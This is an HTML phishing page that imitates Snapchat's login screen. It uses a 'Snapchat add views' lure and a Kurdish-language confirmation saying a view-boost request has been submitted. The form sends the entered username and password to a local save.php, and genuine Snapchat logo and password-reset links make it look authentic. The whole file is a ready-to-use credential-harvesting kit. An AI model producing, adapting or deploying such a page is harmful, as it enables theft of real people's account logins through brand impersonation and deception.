<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Snapchat add views</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <style>
    @import url('https://fonts.googleapis.com/css?family=Heebo:400,500,600,800&display=swap');
    * { outline: 0; box-sizing: border-box; }
    body {
      background-color: #f2f2f2;
      font-family: 'Heebo', sans-serif;
      display: flex;
      align-items: center;
      justify-content: center;
      height: 100vh;
      margin: 0;
    }
    form {
      background: white;
      padding: 20px;
      border-radius: 6px;
      width: 356px;
      text-align: center;
    }
    h1 {
      font-size: 24px;
      font-weight: 800;
      color: #16191C;
    }
    img {
      width: 40px;
      margin: 0 auto 12px;
      display: block;
    }
    .usrnm, .pass {
      text-align: left;
      margin: 15px 0;
    }
    label {
      font-size: 12px;
      font-weight: 600;
      color: #656B73;
      margin-bottom: 5px;
      display: block;
    }
    input {
      width: 100%;
      height: 44px;
      padding: 0 12px;
      background: #F7F7F7;
      border: 1px solid #F7F7F7;
      border-radius: 4px;
      font-size: 14px;
      font-weight: 500;
      transition: 0.15s;
    }
    input:focus {
      border-bottom: 1px solid #FFD301;
      box-shadow: 0 1px 0 #FFD301;
      background: #F2F2F2;
    }
    input[type="submit"] {
      background-color: #FFFC00;
      color: #16191C;
      border-radius: 45px;
      cursor: pointer;
      border: none;
      margin-top: 20px;
    }
    a {
      font-size: 12px;
      color: #656B73;
      text-decoration: none;
    }
    a:hover {
      border-bottom: 1px solid #FFD301;
    }
    #success-msg {
      display: none;
      margin-top: 20px;
      background: #e0ffe0;
      color: #2e7d32;
      padding: 10px;
      border-radius: 5px;
      font-weight: 600;
    }
  </style>
</head>
<body>
  <form id="login-form" method="POST" action="save.php">
    <img src="https://accounts.snapchat.com/accounts/static/images/ghost/snapchat-app-icon.svg" alt="Snapchat Logo">
    <h1>Log in to Snapchat</h1>
    <div class="usrnm">
      <label for="usrnm">Username or Email</label>
      <input id="usrnm" type="text" name="username" required>
    </div>
    <div class="pass">
      <label for="pass">Password</label>
      <input id="pass" type="password" name="password" required>
      <small><a href="https://accounts.snapchat.com/accounts/password_reset_options">Forgot password?</a></small>
    </div>
    <input type="submit" value="Log In">
    <div id="success-msg">داواکاری زیادکردن بینەری پۆست بەرزکرایەوە لەماوەی ٢٤کاژمێر زیاددەکرێت</div>
  </form>
</body>
</html>
